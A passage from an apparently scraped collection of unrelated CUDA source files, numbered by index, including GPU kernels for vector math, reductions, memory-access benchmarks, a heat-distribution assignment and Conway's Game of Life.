cudaMemcpy(dataBase,dB,n*m*sizeof(int),cudaMemcpyDeviceToHost); otp = fopen(argv[2], "w"); for(i=0; i<m; ++i) { for(j=0; j<n; ++j) fprintf(otp, "%d ", dataBase[i*n + j]); fprintf(otp, "\n"); } return 0; }
21,413
__global__ void sinwave_kernal(float4 *pos, unsigned int width, unsigned int hight, float time) { unsigned int x = blockIdx.x * blockDim.x + threadIdx.x; unsigned int y = blockIdx.y * blockDim.y + threadIdx.y; float u = x / (float)width; float v = y / (float)hight; u = u * 2.0f - 1.0f; v = v * 2.0f - 1.0f; float freq = 4.0f; float w = sinf(u * freq + time) * cosf(v * freq + time) * 0.5f; pos[y * width + x] = make_float4(u,w,v,1.0f); } void LaunchCUDAKernal(float4 *pPos, unsigned int mesh_width, unsigned int mesh_hight, float time) { dim3 block(8,8,1); //GPU threads block dimenation x: 8 , Y : 8 dim3 grid(mesh_width / block.x, mesh_hight / block.y,1); sinwave_kernal<<<grid,block>>>(pPos, mesh_width, mesh_hight, time); }
21,414
#include "includes.h" __global__ void reverseSort_kernel(unsigned int * d_newArray, unsigned int * d_oldArray, unsigned int numElems) { unsigned int gIdx = blockIdx.x * blockDim.x + threadIdx.x; if (gIdx < numElems) { d_newArray[gIdx] = d_oldArray[(numElems - 1)- gIdx]; } }
21,415
#include <iostream> #include <curand.h> using namespace std; #include <curand.h> struct random_d_array { float *data; int n; random_d_array(int n) :n{n} { cudaMalloc((void**)&data, n*sizeof(float)); curandGenerator_t gen; curandCreateGenerator(&gen, CURAND_RNG_PSEUDO_DEFAULT); curandGenerateUniform(gen, data, n); } ~random_d_array() { cudaFree(&data); } }; __global__ void copy1(float *a, float *b, int n) { int id = threadIdx.x + blockDim.x * blockIdx.x; if(id < n) a[id] = b[id]; } __global__ void copy2(float *a, float *b, int n, int offset) { int id = threadIdx.x + blockDim.x * blockIdx.x; if(id < n) a[id] = b[(id + offset) % n]; } __global__ void copy3(float *a, float *b, int n, int stride) { int id = threadIdx.x + blockDim.x * blockIdx.x; if(id < n) a[id] = b[(id * stride) % n]; } float call1(float *a, float *b, int n, int blockSize, int gridSize, int i) { cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); cudaEventRecord(start); copy1<<<gridSize,blockSize>>>(a, b, n); cudaEventRecord(stop); cudaEventSynchronize(stop); float milliseconds = 0; cudaEventElapsedTime(&milliseconds, start, stop); cudaEventDestroy(start); cudaEventDestroy(stop); cout << "copy1: " << i << ": " << milliseconds << " ms" << endl; return milliseconds; } float call2(float *a, float *b, int n, int offset, int blockSize, int gridSize, int i) { cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); cudaEventRecord(start); copy2<<<gridSize,blockSize>>>(a, b, n, offset); cudaEventRecord(stop); cudaEventSynchronize(stop); float milliseconds = 0; cudaEventElapsedTime(&milliseconds, start, stop); cudaEventDestroy(start); cudaEventDestroy(stop); cout << "copy2: " << i << ": " << milliseconds << " ms" << endl; return milliseconds; } float call3(float *a, float *b, int n, int stride, int blockSize, int gridSize, int i) { cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); cudaEventRecord(start); copy2<<<gridSize,blockSize>>>(a, b, n, stride); cudaEventRecord(stop); cudaEventSynchronize(stop); float milliseconds = 0; cudaEventElapsedTime(&milliseconds, start, stop); cudaEventDestroy(start); cudaEventDestroy(stop); cout << "copy3: " << i << ": " << milliseconds << " ms" << endl; return milliseconds; } int main() { const int N = 1024*1024*1024; const int iterations = 10; const int blockSize = 32; const int gridSize = (N + blockSize - 1)/blockSize; random_d_array a(N); random_d_array b(N); float average = 0.0; cout << "============= coalesced read ==============" << endl; call1(a.data, b.data, N, blockSize, gridSize, -1); for(int i = 0; i < iterations; ++i) average += call1(a.data, b.data, N, blockSize, gridSize, i); average /= iterations; cout << "Average = " << average << endl; cout << "============= offset read =================" << endl; average = 0.0; const int offset = 17; call2(a.data, b.data, N, offset, blockSize, gridSize, -1); for(int i = 0; i < iterations; ++i) average += call2(a.data, b.data, N, offset, blockSize, gridSize, i); average /= iterations; cout << "Average = " << average << endl; cout << "============= strided read ================" << endl; average = 0.0; const int stride = 17; call3(a.data, b.data, N, stride, blockSize, gridSize, -1); for(int i = 0; i < iterations; ++i) average += call3(a.data, b.data, N, stride, blockSize, gridSize, i); average /= iterations; cout << "Average = " << average << endl; }
21,416
#include <cuda.h> #include "cuda_runtime.h" #include <iostream> #include <ctime> #include <stdlib.h> // imported for the random functionality using namespace std; __global__ void AddIntegers(int *arr1, int *arr2, int num_elements) { int id = blockIdx.x * blockDim.x + threadIdx.x; if (id < num_elements) { arr1[id] += arr2[id]; } } int main() { srand(time(NULL)); int num_elements = 100; int *array1, *array2; array1 = new int[num_elements]; array2 = new int[num_elements]; // initialize with random numbers for (int i = 0; i < num_elements; i++) { array1[i] = rand() % 1000; array2[i] = rand() % 1000; } // print the numbers that were initialized cout << "The numbers that were initialized were : " << endl; for (int i = 0; i < num_elements; i++) cout << array1[i] << " " << array2[i] << endl; cout << endl; // now initialize kernel int *deviceArray1, *deviceArray2; if (cudaMalloc(&deviceArray1, sizeof(int) * num_elements) != cudaSuccess) { cout << "Couldn't initialize deviceArray1!" << endl; return 0; } if (cudaMalloc(&deviceArray2, sizeof(int) * num_elements) != cudaSuccess) { cout << "Couldn't initialize deviceArray2!" << endl; cudaFree(deviceArray1); return 0; } // now copy the data from the local memory to GPU memory if (cudaMemcpy(deviceArray1, array1, sizeof(int) * num_elements, cudaMemcpyHostToDevice) != cudaSuccess) { cout << "Could not copy to deviceArray1!" << endl; cudaFree(deviceArray1); cudaFree(deviceArray2); return 0; } if (cudaMemcpy(deviceArray2, array2, sizeof(int) * num_elements, cudaMemcpyHostToDevice) != cudaSuccess) { cout << "Could not copy to deviceArray2!" << endl; cudaFree(deviceArray1); cudaFree(deviceArray2); return 0; } AddIntegers<<<num_elements / 256 + 1, 256 >>>(deviceArray1, deviceArray2, num_elements); // now copy the data back from the GPU memory to local memory if (cudaMemcpy(array1, deviceArray1, sizeof(int) * num_elements, cudaMemcpyDeviceToHost) != cudaSuccess) { delete[] array1; delete[] array2; cudaFree(deviceArray1); cudaFree(deviceArray2); return 0; } for (int i = 0; i < num_elements; i++) cout << array1[i] << endl; cudaFree(deviceArray1); cudaFree(deviceArray2); delete[] array1; delete[] array2; return 0; }
21,417
#include "includes.h" __global__ void block_normalization_kernel(float* histograms, float* descriptor, int histograms_step, int block_grid_width, int block_grid_height, int block_width, int block_height, int num_bins, int cell_grid_width, int block_stride_x, int block_stride_y) { //TODO: make the buffer sizes dependent on an input or template parameter. // Each thread block will process 8 hog blocks. Each hog block has 4 cells. // Each cell has 9 bins. __shared__ float s_blocks[9 * 4 * 8]; __shared__ float L1_norm[8]; int block_x = blockIdx.x * 8 + threadIdx.z; if(block_x >= block_grid_width) { return; } int block_y = blockIdx.y; if(block_y >= block_grid_height) { return; } int block_idx = block_y * blockDim.y + block_x; int cell_x = block_x * block_stride_x + threadIdx.y % 2; int cell_y = block_y * block_stride_y + threadIdx.y / 2; int hist_idx = histograms_step * cell_y + num_bins * (cell_x) + threadIdx.x; int s_blocks_idx = 9 * threadIdx.y + threadIdx.x; s_blocks[s_blocks_idx] = histograms[hist_idx]; __syncthreads(); int thread_id = 36 * threadIdx.z + 9 * threadIdx.y + threadIdx.x; int elements_per_block = block_height * block_width * num_bins; if(thread_id < 8) { L1_norm[thread_id] = 0.0f; for(int i = 0; i < elements_per_block; ++i) { L1_norm[thread_id] += s_blocks[elements_per_block * thread_id + i]; } } __syncthreads(); descriptor[elements_per_block * block_idx + s_blocks_idx] = s_blocks[s_blocks_idx] / L1_norm[threadIdx.z]; }
21,418
#include "includes.h" extern "C" { } __global__ void broadcast_backward(float* dx, const float* dy, unsigned int c, unsigned int len) { int tid = blockIdx.x * blockDim.x + threadIdx.x; if (tid < len) { atomicAdd(&dx[tid % c], dy[tid]); } }
21,419
/* * This file is part of cuAutotools. * * cuAutotools is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * cuAutotools is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with cuAutotools. If not, see <http://www.gnu.org/licenses/>. */ #include <stdio.h> #include <stdlib.h> #include <cuda.h> __global__ void kernel(void) { } int main(int argc, char *argv[]) { cudaError_t d_error = cudaSuccess; printf("[*] Calling useless kernel...\n"); kernel<<<1,1>>>(); d_error = cudaGetLastError(); if(d_error!=cudaSuccess) { fprintf(stderr,"[ERROR] Error running the simples kernel available\n"); return EXIT_FAILURE; } printf("[*] Useless kernel called, runned, and exit normally...\n"); return EXIT_SUCCESS; }
21,420
/* * Please write your name and net ID below * * Last name: Adam * First name: Steven * Net ID: sna219 * */ /* * This file contains the code for doing the heat distribution problem. * You do not need to modify anything except starting gpu_heat_dist() at the bottom * of this file. * In gpu_heat_dist() you can organize your data structure and the call to your * kernel(s) that you need to write too. * * You compile with: * nvcc -o heatdist heatdist.cu */ #include <cuda.h> #include <stdlib.h> #include <stdio.h> #include <time.h> /* To index element (i,j) of a 2D array stored as 1D */ #define index(i, j, N) ((i)*(N)) + (j) /*****************************************************************/ // Function declarations: Feel free to add any functions you want. void seq_heat_dist(float *, unsigned int, unsigned int); void gpu_heat_dist(float *, unsigned int, unsigned int); /*****************************************************************/ int main(int argc, char * argv[]) { unsigned int N; /* Dimention of NxN matrix */ int type_of_device = 0; // CPU or GPU int iterations = 0; int i; /* The 2D array of points will be treated as 1D array of NxN elements */ float * playground; // to measure time taken by a specific part of the code double time_taken; clock_t start, end; if(argc != 4) { fprintf(stderr, "usage: heatdist num iterations who\n"); fprintf(stderr, "num = dimension of the square matrix (50 and up)\n"); fprintf(stderr, "iterations = number of iterations till stopping (1 and up)\n"); fprintf(stderr, "who = 0: sequential code on CPU, 1: GPU execution\n"); exit(1); } type_of_device = atoi(argv[3]); N = (unsigned int) atoi(argv[1]); iterations = (unsigned int) atoi(argv[2]); /* Dynamically allocate NxN array of floats */ playground = (float *)calloc(N*N, sizeof(float)); if( !playground ) { fprintf(stderr, " Cannot allocate the %u x %u array\n", N, N); exit(1); } /* Initialize it: calloc already initalized everything to 0 */ // Edge elements to 80F for(i = 0; i < N; i++) playground[index(0,i,N)] = 80; for(i = 0; i < N; i++) playground[index(i,0,N)] = 80; for(i = 0; i < N; i++) playground[index(i,N-1, N)] = 80; for(i = 0; i < N; i++) playground[index(N-1,i,N)] = 80; // from (0,10) to (0,30) inclusive are 150F for(i = 10; i <= 30; i++) playground[index(i,0,N)] = 150; if( !type_of_device ) // The CPU sequential version { start = clock(); seq_heat_dist(playground, N, iterations); end = clock(); } else // The GPU version { start = clock(); gpu_heat_dist(playground, N, iterations); end = clock(); } time_taken = ((double)(end - start))/ CLOCKS_PER_SEC; printf("Time taken for %s is %lf\n", type_of_device == 0? "CPU" : "GPU", time_taken); free(playground); return 0; } /***************** The CPU sequential version (DO NOT CHANGE THAT) **************/ void seq_heat_dist(float * playground, unsigned int N, unsigned int iterations) { // Loop indices int i, j, k; int upper = N-1; // number of bytes to be copied between array temp and array playground unsigned int num_bytes = 0; float * temp; /* Dynamically allocate another array for temp values */ /* Dynamically allocate NxN array of floats */ temp = (float *)calloc(N*N, sizeof(float)); if( !temp ) { fprintf(stderr, " Cannot allocate temp %u x %u array\n", N, N); exit(1); } num_bytes = N*N*sizeof(float); /* Copy initial array in temp */ memcpy((void *)temp, (void *) playground, num_bytes); for( k = 0; k < iterations; k++) { /* Calculate new values and store them in temp */ for(i = 1; i < upper; i++) for(j = 1; j < upper; j++) temp[index(i,j,N)] = (playground[index(i-1,j,N)] + playground[index(i+1,j,N)] + playground[index(i,j-1,N)] + playground[index(i,j+1,N)])/4.0; /* Move new values into old values */ memcpy((void *)playground, (void *) temp, num_bytes); } } /***************** The GPU version: Write your code here *********************/ __global__ void compute_heat(float * d_temp, float * d_playground, unsigned int N) { int row = blockIdx.y * blockDim.y + threadIdx.y; int col = blockIdx.x * blockDim.x + threadIdx.x; if (row > 0 && row < N-1 && col > 0 && col < N-1) { d_temp[index(row,col,N)] = (d_playground[index(row-1,col,N)] + d_playground[index(row+1,col,N)] + d_playground[index(row,col-1,N)] + d_playground[index(row,col+1,N)])/4.0; } } /* This function can call one or more kenels *********************************/ void gpu_heat_dist(float * playground, unsigned int N, unsigned int iterations) { int k; //number of bytes to be copied between array temp and array playground unsigned int num_bytes = N*N*sizeof(float); //allocate memory to device float * d_temp; float * d_playground; cudaMalloc((void **)&d_temp, num_bytes); cudaMalloc((void **)&d_playground, num_bytes); //copy array from host to device cudaMemcpy(d_playground, playground, num_bytes, cudaMemcpyHostToDevice); cudaMemcpy(d_temp, d_playground, num_bytes, cudaMemcpyDeviceToDevice); //data locality //divide problem into 2d blocks in 2d grid dim3 blockDim(10, 10); //problem size is multiples of 100 dim3 gridDim(ceil(N/10), ceil(N/10)); //calulations performed in device for(k=0; k < iterations; k++) { compute_heat<<<gridDim, blockDim>>>(d_temp, d_playground, N); //copy results in device from temp to playground cudaMemcpy(d_playground, d_temp, num_bytes, cudaMemcpyDeviceToDevice); } //copy array from device to host cudaMemcpy(playground, d_temp, num_bytes, cudaMemcpyDeviceToHost); cudaFree(d_playground); cudaFree(d_temp); }
21,421
#include "includes.h" __global__ void cube_select_four(int b, int n,float radius, const float* xyz, int* idx_out) { int batch_idx = blockIdx.x; xyz += batch_idx * n * 3; idx_out += batch_idx * n * 32; float temp_dist[32]; float judge_dist = radius * radius; for(int i = threadIdx.x; i < n;i += blockDim.x) { float x = xyz[i * 3]; float y = xyz[i * 3 + 1]; float z = xyz[i * 3 + 2]; for(int j = 0;j < 32;j ++) { temp_dist[j] = judge_dist; idx_out[i * 32 + j] = i; // if not found, just return itself.. } for(int j = 0;j < n;j ++) { if(i == j) continue; float tx = xyz[j * 3]; float ty = xyz[j * 3 + 1]; float tz = xyz[j * 3 + 2]; float dist = (x - tx) * (x - tx) + (y - ty) * (y - ty) + (z - tz) * (z - tz); if(dist > judge_dist) continue; int _x = (tx > x); int _y = (ty > y); int _z = (tz > z); int temp_idx = _x * 16 + _y * 8 + _z * 4; bool flag = false; for(int k = 0;k < 4;k ++) { if (dist < temp_dist[temp_idx + k]) { flag = true; } if (flag) { for (int kk = 3; kk >= k + 1; kk --) { idx_out[i * 32 + temp_idx + kk] = idx_out[i * 32 + temp_idx + kk - 1]; temp_dist[temp_idx + kk] = temp_dist[temp_idx + kk - 1]; } idx_out[i * 32 + temp_idx + k] = j; temp_dist[temp_idx + k] = dist; break; } } } } }
21,422
#include <iostream> #include <vector> using namespace std; int main() { cerr << "Starting" << endl; int NUM = 100; vector<float> h_vec1(NUM); vector<float> h_vec2(NUM); for (size_t i = 0; i < NUM; ++i) { h_vec1[i] = i * 3; } int *d_vec; cudaMalloc(&d_vec, NUM * sizeof(float)); // copy //cudaMemcpy(d_vec, h_vec1.data(), NUM * sizeof(float), cudaMemcpyHostToDevice); //cudaMemcpy(h_vec2.data(), d_vec, NUM * sizeof(float), cudaMemcpyDeviceToHost); cudaStream_t stream; cudaStreamCreate(&stream); cudaMemcpyAsync(d_vec, h_vec1.data(), NUM * sizeof(float), cudaMemcpyHostToDevice, stream); cudaMemcpyAsync(h_vec2.data(), d_vec, NUM * sizeof(float), cudaMemcpyDeviceToHost, stream); cerr << "h_vec2="; for (size_t i = 0; i < NUM; ++i) { cerr << h_vec2[i] << " "; } cerr << endl; cudaStreamDestroy(stream); cerr << "Finished" << endl; }
21,423
#include <iostream> #include <math.h> using namespace std; #define W 500 #define H 500 #define TPB 32 __device__ unsigned char clip(int n) { if (n>255) return n; else if (n<0) return 0; else return n; } __device__ int square(int x) { return (x*x); } __global__ void distKernel(uchar4 *dout, int w, int h, int2 pos) { const int c = blockIdx.x*blockDim.x + threadIdx.x; const int r = blockIdx.y*blockDim.y + threadIdx.y; const int i = r*w + c; if ((c >= w) || (r >= h)) return; int d = sqrtf(square(c-pos.x) + square(r-pos.y)); unsigned char intensity = clip(255-d); dout[i].x = intensity; // red dout[i].y = intensity; // green dout[i].z = 0; // blue dout[i].w = 255; // opaque } int main() { uchar4 *out = new uchar4 [W*H]; uchar4 *dout = new uchar4; const int size = W*H*sizeof(uchar4); cudaMalloc(&dout,size); const int2 pos = {0, 0}; const dim3 tpb(TPB, TPB); const dim3 bpg((W+TPB-1)/TPB, (H+TPB-1)/TPB); distKernel<<<bpg,tpb>>>(dout,W,H,pos); cudaMemcpy(out,dout,size,cudaMemcpyDeviceToHost); cudaFree(dout); delete [] out; }
21,424
#include<bits/stdc++.h> using namespace std; #define pi (2.0*acos(0.0)) #define eps 1e-6 #define ll long long #define inf (1<<29) #define vi vector<int> #define vll vector<ll> #define sc(x) scanf("%d",&x) #define scl(x) scanf("%lld",&x) #define all(v) v.begin() , v.end() #define me(a,val) memset( a , val ,sizeof(a) ) #define pb(x) push_back(x) #define pii pair<int,int> #define mp(a,b) make_pair(a,b) #define Q(x) (x) * (x) #define L(x) ((x<<1) + 1) #define R(x) ((x<<1) + 2) #define M(x,y) ((x+y)>>1) #define fi first #define se second #define MOD 1000000007 #define ios ios::sync_with_stdio(0) #define N 64 #define TB 32 float A[N][N]; float B[N][N]; float C[N][N]; __global__ void MatAdd(float A[N][N], float B[N][N], float C[N][N]) { int i = blockIdx.x * blockDim.x + threadIdx.x; int j = blockIdx.y * blockDim.y + threadIdx.y; if (i < N && j < N) C[i][j] = A[i][j] + B[i][j]; } int main(){ float (*d_A)[N]; //pointers to arrays of dimension N float (*d_B)[N]; float (*d_C)[N]; for(int i = 0; i < N; i++) { for(int j = 0; j < N; j++) { A[i][j] = i; B[i][j] = j; } } //allocation cudaMalloc((void**)&d_A, (N*N)*sizeof(float)); cudaMalloc((void**)&d_B, (N*N)*sizeof(float)); cudaMalloc((void**)&d_C, (N*N)*sizeof(float)); //copying from host to device cudaMemcpy(d_A, A, (N*N)*sizeof(float), cudaMemcpyHostToDevice); cudaMemcpy(d_B, B, (N*N)*sizeof(float), cudaMemcpyHostToDevice); cudaMemcpy(d_C, C, (N*N)*sizeof(float), cudaMemcpyHostToDevice); // Kernel invocation dim3 threadsPerBlock(16, 16); dim3 numBlocks(N / threadsPerBlock.x, N / threadsPerBlock.y); MatAdd<<<numBlocks, threadsPerBlock>>>(d_A, d_B, d_C); //copying from device to host cudaMemcpy(A, (d_A), (N*N)*sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(B, (d_B), (N*N)*sizeof(float), cudaMemcpyDeviceToHost); cudaMemcpy(C, (d_C), (N*N)*sizeof(float), cudaMemcpyDeviceToHost); for(int i = 0; i < N; i++){ for(int j = 0; j < N; j++) printf("%lf ", C[i][j]); printf("\n"); } return 0; }
21,425
#include <stdio.h> #include <stdlib.h> #include <sys/time.h> #include <math.h> //Dimension of problem grid #define NPROB 240 #define GENERATION 100000 //Size of threads should be multiple of warp's size(32) #define THREAD_NUMBER 64 //Standard inidat void inidat(int nx, bool *u) { int ix, iy; for (ix = 0; ix <= nx - 1; ix++) { for (iy = 0; iy <= nx - 1; iy++) { u[ix*NPROB+iy] = rand() % 2; } } } //Standard prtdat void prtdat(int nx, bool* u, char *fnam) { int ix, iy; FILE *fp; fp = fopen(fnam, "w"); for (ix = 0; ix < nx; ix++) { for (iy = 0; iy < nx; iy++) { fprintf(fp, "%d", u[ix*NPROB+iy]); if (iy != nx - 1) { fprintf(fp, " "); } else { fprintf(fp, "\n"); } } } fclose(fp); } __global__ void Update(bool *A, bool* B) { //Take Indexes int i, j,temp,sum,down,up,left,right; temp = blockIdx.x * blockDim.x + threadIdx.x; i = temp / NPROB; j = temp % NPROB; //Check for errors and values of edges if (i < 0 || i > NPROB - 1 || j < 0 || j > NPROB - 1) { return; } down = (i != NPROB-1) ? i+1 : 0; up = (i != 0) ? i-1 : NPROB-1; left = (j != 0) ? j-1 : NPROB-1; right = (j != NPROB-1) ? j+1 : 0; sum = A[down*NPROB+j] + A[up*NPROB+j] + A[i*NPROB+left] + A[i*NPROB+right] + A[down*NPROB+left] + A[up*NPROB+left] + A[down*NPROB+right] + A[up*NPROB+right]; //Calculate formula B[i*NPROB+j] = ((sum == 3) || (A[i*NPROB+j] == true && sum == 2)); __syncthreads(); } int main(int argc,char *argv[]) { bool *d_A,*d_B, *h_A; int it; //Creating two 1d arrays for cuda cudaMalloc((void**)&d_A,(unsigned long)(NPROB*NPROB*sizeof(bool))); cudaMalloc((void**)&d_B,(unsigned long)(NPROB*NPROB*sizeof(bool))); //Creating h_A to initialiaze h_A=(bool*)malloc(NPROB*NPROB*sizeof(bool)); memset(h_A,0,NPROB*NPROB*sizeof(bool)); //Transfering the h_A to device printf("Grid size: %d Generations: %d\n", NPROB, GENERATION); printf("Initializing grid and writing in initial.dat \n"); inidat(NPROB,h_A); prtdat(NPROB, h_A, "initial.dat"); cudaMemcpy(d_B,h_A,NPROB*NPROB*sizeof(bool),cudaMemcpyHostToDevice); cudaMemcpy(d_A,h_A,NPROB*NPROB*sizeof(bool),cudaMemcpyHostToDevice); bool* handler; struct timeval tv1, tv2; gettimeofday(&tv1, NULL); for (it = 1; it <= GENERATION; it++) { //Swapping between the two arrays Update<<<NPROB*NPROB/THREAD_NUMBER+1,THREAD_NUMBER>>>(d_A,d_B); cudaThreadSynchronize(); handler = d_A; d_A = d_B; d_B = handler; } gettimeofday(&tv2, NULL); printf("Finished after %f seconds\n", (double) (tv2.tv_usec - tv1.tv_usec) / 1000000 + (double) (tv2.tv_sec - tv1.tv_sec)); printf("Writing final.dat file \n"); //Copy results back to host memory cudaMemcpy(h_A,d_A, NPROB*NPROB*sizeof(bool), cudaMemcpyDeviceToHost) ; //Print Results prtdat(NPROB, h_A, "final.dat"); cudaFree(d_A); cudaFree(d_B); free(h_A); }
21,426
#include "cuda_includes.cuh" #include <stdlib.h> #include <stdio.h> void HandleError(cudaError_t err, const char* file, int line) { if (err != cudaSuccess) { printf("%s in %s at line %d\n", cudaGetErrorString(err), file, line); exit(EXIT_FAILURE); } } struct Sphere;
21,427
// Device code extern "C" __global__ void scale(float* A, float scalar, int N) { int i = blockDim.x * blockIdx.x + threadIdx.x; if (i < N) A[i] = A[i]*scalar; }
21,428
#include "includes.h" __global__ void cudaSScaleAbs_kernel(unsigned int size, float* input, const float scale, const float beta, float* result) { const unsigned int index = blockIdx.x * blockDim.x + threadIdx.x; const unsigned int stride = blockDim.x * gridDim.x; if (beta != 0.0f) { for (unsigned int i = index; i < size; i += stride) result[i] = fabs(input[i]) * scale + beta * result[i]; } else { for (unsigned int i = index; i < size; i += stride) result[i] = fabs(input[i]) * scale; } }
21,429
#include "includes.h" __global__ void KerSortDataParticles(unsigned n,unsigned pini,const unsigned *sortpart,const float3 *a,float3 *a2) { const unsigned p=blockIdx.x*blockDim.x + threadIdx.x; //-Particle number. if(p<n){ const unsigned oldpos=(p<pini? p: sortpart[p]); a2[p]=a[oldpos]; } }
21,430
#include "includes.h" __global__ void mask_kernel(int n, float *x, float mask_num, float *mask, float val) { int i = (blockIdx.x + blockIdx.y*gridDim.x) * blockDim.x + threadIdx.x; if(i < n && mask[i] == mask_num) x[i] = val; }
21,431
#include <iostream> #include <iomanip> __global__ void KernelVectorAbs(double *vector, int size){ int i = threadIdx.x + blockIdx.x * blockDim.x; int offset = gridDim.x * blockDim.x; while (i < size) { vector[i] = (vector[i] < 0) ? -vector[i] : vector[i]; i += offset; } } int main(){ std::ios_base::sync_with_stdio(false); int size, blocks, threds; std::cin >> blocks >> threds >> size; double *vector = new double[size], *result = new double[size], *cudaVecor; for (int i = 0; i < size; ++i) std::cin >> vector[i]; cudaMalloc((void **) &cudaVecor, sizeof(double) * size); cudaMemcpy(cudaVecor, vector, sizeof(double) * size, cudaMemcpyHostToDevice); KernelVectorAbs<<<blocks, threds>>>(cudaVecor, size); cudaGetLastError(); cudaMemcpy(result, cudaVecor, sizeof(double) * size, cudaMemcpyDeviceToHost); std::cout.setf(std::ios::scientific); std::cout.precision(10); for (int i = 0; i < size; ++i) std::cout << result[i] << ' '; std::cout << '\n'; cudaFree(cudaVecor); delete[] vector; }
21,432
#include "includes.h" __global__ void cudaDRectifier_propagate_kernel(double* x, double* y, unsigned int size, double leakSlope, int shifting, double clipping) { const unsigned int index = blockIdx.x * blockDim.x + threadIdx.x; const unsigned int stride = blockDim.x * gridDim.x; for (unsigned int i = index; i < size; i += stride) { double value = x[i]; if (shifting > 0) value /= (1 << shifting); else if (shifting < 0) value *= (1 << (-shifting)); if (clipping > 0.0) y[i] = (value > 0.0) ? min(value, clipping) : leakSlope * value; else y[i] = (value > 0.0) ? value : leakSlope * value; } }
21,433
#include "includes.h" __global__ void CumulateThroughTimeKernel(float* memoryBlocks, int count, int sequenceLength) { int memoryIdx = blockDim.x * blockIdx.y * gridDim.x + blockDim.x * blockIdx.x + threadIdx.x; if (memoryIdx < count) { for (size_t i = 1; i < sequenceLength; i++) { int memoryBlockOffset = i * count; memoryBlocks[memoryIdx] += memoryBlocks[memoryBlockOffset + memoryIdx]; } } }
21,434
/* * * atomic32.cu * * Microdemo for atomic operations on 32-bit integers in global memory. * * NOT INTENDED AS A SAMPLE FOR ANYTHING OTHER THAN CODE GENERATION. * * Build with: * nvcc --gpu-architecture sm_xx --cubin atomic32.cu * cuobjdump --dump-sass atomic32.cubin * (fill in xx with 11, 20, or 30 to examine code generation of Tesla, * Fermi and Kepler, respectively) * * Copyright (c) 2011-2012, Archaea Software, LLC. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. * */ __global__ void AddTo32( int *sum, int *out, const int *pIn ) { (void) atomicAdd( &out[threadIdx.x], *pIn ); } __global__ void Return32( int *sum, int *out, const int *pIn ) { out[threadIdx.x] = atomicAdd( &sum[threadIdx.x], *pIn ); }
21,435
#include "includes.h" __global__ void reduceInterleaved (int *g_idata, int *g_odata, unsigned int n) { // set thread ID unsigned int tid = threadIdx.x; unsigned int idx = blockIdx.x * blockDim.x + threadIdx.x; // boundary check if(idx >= n) return; // in-place reduction in global memory for (int stride = blockDim.x / 2; stride > 0; stride /= 2) { if (tid < stride) { g_idata[idx] += g_idata[idx + stride]; } __syncthreads(); } // write result for this block to global mem if (tid == 0) g_odata[blockIdx.x] = g_idata[idx]; }
21,436
#include <iostream> #include <stdlib.h> #include <string.h> #define gpuErrchk(ans) { gpuAssert((ans), __FILE__, __LINE__); } inline void gpuAssert(cudaError_t code, const char *file, int line, bool abort=true) { if (code != cudaSuccess) { fprintf(stderr,"GPUassert: %s %s %d\n", cudaGetErrorString(code), file, line); if (abort) exit(code); } } using namespace std; __global__ void vectorSumWithinBlock(int * DA, int n, int* Das){ extern __shared__ int SA[]; int i = threadIdx.x; if(i < n){ SA[i] = DA[i]; } __syncthreads(); for(int offset = 1; offset < n; ){ if(i < n && i+offset < n){ SA[i]+=SA[i+offset]; } __syncthreads(); offset*=2; } *Das = SA[0]; } __global__ void vectorSumWithinBlock2(int* DA, int n, int* Das){ extern __shared__ int SA[]; int i = threadIdx.x; if(i < n){ SA[i] = DA[i]; } __syncthreads(); if(i < 128 && i+128<n){ SA[i] += SA[i+128]; } __syncthreads(); if(i < 64 && i+64<n){ SA[i] += SA[i+64]; } __syncthreads(); if(i < 32 && i+32<n){ SA[i] += SA[i+32]; } __syncthreads(); if(i < 16 && i+16<n){ SA[i] += SA[i+16]; } __syncthreads(); if(i < 8 && i+8<n){ SA[i] += SA[i+8]; } __syncthreads(); if(i < 4 && i+4<n){ SA[i] += SA[i+4]; } __syncthreads(); if(i < 2 && i+2<n){ SA[i] += SA[i+2]; } __syncthreads(); if(i < 1 && i+1<n){ SA[i] += SA[i+1]; } __syncthreads(); *Das = SA[0]; } // need to ensure n is larger than 32 __global__ void vectorSumWithinBlock3(int* DA, int n, int* Das){ extern __shared__ int SA[]; int i = threadIdx.x; if(i < n){ SA[i] = DA[i]; } __syncthreads(); if(i < 128 && i+128<n){ SA[i] += SA[i+128]; } __syncthreads(); if(i < 64 && i+64<n){ SA[i] += SA[i+64]; } __syncthreads(); if(i < 32 && i+32<n){ SA[i] += SA[i+32]; SA[i] += SA[i+16]; SA[i] += SA[i+8]; SA[i] += SA[i+4]; SA[i] += SA[i+2]; SA[i] += SA[i+1]; } __syncthreads(); *Das = 